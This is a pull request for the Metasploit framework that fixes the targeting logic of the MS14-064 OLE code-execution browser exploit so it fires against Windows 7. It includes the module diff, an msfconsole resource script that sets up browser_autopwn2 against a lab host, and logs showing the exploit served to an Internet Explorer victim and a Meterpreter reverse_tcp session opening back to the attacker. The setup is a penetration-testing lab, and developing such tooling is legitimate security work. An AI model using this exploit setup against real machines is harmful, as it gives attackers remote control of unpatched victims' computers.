### PR TITLE
Set AllowPowershellPrompt to true in ms14_064_ole_code_execution

### DIFF
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
       register_options(
         [
            OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
-           OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', false])
+           OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', true])
         ], self.class )
 
   end

--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -83,8 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
       register_options(
         [
-           OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false]),
-           OptBool.new('AllowPowershellPrompt', [true, 'Allow exploit to try Powershell', true])
+           OptBool.new('TRYUAC', [true, 'Ask victim to start as Administrator', false])
         ], self.class )
 
   end
@@ -359,7 +358,7 @@ end function
   end
 
   def on_request_exploit(cli, request, target_info)
-    if get_target.name.match(OperatingSystems::Match::WINDOWS_7) && !datastore['AllowPowershellPrompt']
+    if !get_target.name.match(OperatingSystems::Match::WINDOWS_7) && !get_target.name.match(OperatingSystems::Match::WINDOWS_XP)
       send_not_found(cli)
       return
     end


### PR DESCRIPTION
The AllowPowershellPrompt should be set to true by default. Fixes a bug when it's used in browser_autopwn2 (and as standalone exploit) and a "victim" is accessing the exploit with Win7. 
I have noticed that if the AllowPowershellPrompt is set to false, in case of "victim" using win7 the exploit hits send_not_found(cli) on line 363.

Mew.

**## Verification**

**root@unknown:~/tmp# cat bes.rc** 

```
use auxiliary/server/browser_autopwn2
set SRVHOST 192.168.114.157
set URIPATH /test
set LHOST 192.168.114.157
set include_pattern ms14_064
set VERBOSE true
run
```

**root@unknown:~/tmp# msfconsole -r bes.rc** 

```
<...>
       =[ metasploit v4.12.9-dev                          ]
+ -- --=[ 1556 exploits - 902 auxiliary - 268 post        ]
+ -- --=[ 438 payloads - 38 encoders - 8 nops             ]

[*] Processing bes.rc for ERB directives.
<...>

[*] Server started.
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank  Name                         Path   Payload
 -----  ----  ----                         ----   -------
 1      Good  ms14_064_ole_code_execution  /aOiS  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.114.157:8080/test
[*] Server started.

<...>
[*] No cookie received for 192.168.114.159, resorting to headers hash.
[*] Gathering target information for 192.168.114.159
[*] Sending HTML response to 192.168.114.159
[*] Info receiver page called from 192.168.114.159
[*] Received cookie 'cCUwb' from 192.168.114.159
[*] Received sniffed browser data over POST from 192.168.114.159
{"os_name"=>["Windows 7"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["MSIE"], "ua_ver"=>["8.0"], "arch"=>["x86"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["18.0.0.194"], "vuln_test"=>["true"], "office"=>["null"], "mshtml_build"=>["16475"]}.
[*] Received cookie 'cCUwb' from 192.168.114.159
[*] Serving exploit to user 192.168.114.159 with tag cCUwb
[*] Setting target "cCUwb" to :tried.
[*] Received cookie 'cCUwb' from 192.168.114.159
[*] Serving exploit to user 192.168.114.159 with tag cCUwb
[*] Setting target "cCUwb" to :tried.
[*] Comparing requirement: source=(?i-mx:script|headers) vs source=script
[*] Comparing requirement: ua_name=MSIE vs ua_name=MSIE
[*] Comparing requirement: arch=x86 vs arch=x86
[*] Comparing requirement: ua_ver=#<Proc:0x00000007353458@/usr/share/metasploit-framework/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb:71 (lambda)> vs ua_ver=8.0
[*] Comparing requirement: os_name=(?-mix:^(?:Microsoft )?Windows 7) vs os_name=Windows 7
[*] sadness!!!
```

After enabling/patching AllowPowershellPrompt=>true by default
**root@unknown:~/tmp# msfconsole -r bes.rc** 

```
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.

Exploits
========

 Order  Rank  Name                         Path         Payload
 -----  ----  ----                         ----         -------
 1      Good  ms14_064_ole_code_execution  /grMhtdVXAl  windows/meterpreter/reverse_tcp on 4444

[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.114.157:8080/test
[*] Server started.
[*] Starting the payload handler...
[*] Using URL: http://192.168.114.157:8080/grMhtdVXAl
[*] Server started.
[*] No cookie received for 192.168.114.159, resorting to headers hash.
[*] Gathering target information for 192.168.114.159
[*] Sending HTML response to 192.168.114.159
[*] Info receiver page called from 192.168.114.159
[*] Received cookie 'nxOpSCaxEHGcPtdrwcHDS' from 192.168.114.159
[*] Received sniffed browser data over POST from 192.168.114.159
{"os_name"=>["Windows 7"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["MSIE"], "ua_ver"=>["8.0"], "arch"=>["x86"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["18.0.0.194"], "vuln_test"=>["true"], "office"=>["null"], "mshtml_build"=>["16475"]}.
[*] Received cookie 'nxOpSCaxEHGcPtdrwcHDS' from 192.168.114.159
[*] Serving exploit to user 192.168.114.159 with tag nxOpSCaxEHGcPtdrwcHDS
[*] Setting target "nxOpSCaxEHGcPtdrwcHDS" to :tried.
[*] Received cookie 'nxOpSCaxEHGcPtdrwcHDS' from 192.168.114.159
[*] Serving exploit to user 192.168.114.159 with tag nxOpSCaxEHGcPtdrwcHDS
[*] Setting target "nxOpSCaxEHGcPtdrwcHDS" to :tried.
[*] Comparing requirement: source=(?i-mx:script|headers) vs source=script
[*] Comparing requirement: ua_name=MSIE vs ua_name=MSIE
[*] Comparing requirement: arch=x86 vs arch=x86
[*] Comparing requirement: ua_ver=#<Proc:0x000000087818f8@/usr/share/metasploit-framework/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb:71 (lambda)> vs ua_ver=8.0
[*] Comparing requirement: os_name=(?-mix:^(?:Microsoft )?Windows 7) vs os_name=Windows 7
[*] Sending exploit...
[*] Powershell command length: 2327
[*] PowerMewMew sent...
[*] Meterpreter session 1 opened (192.168.114.157:4444 -> 192.168.114.159:48268) at 2016-07-13 18:00:26 -0400
```

_P.S. Messages like "[*] sadness!!!" and "[*] PowerMewMew sent..." were injected in functions "on_request_exploit" and "powershell_vector" respectively for debugging purposes.. And those are missing from the supplied patch, of course ;]_
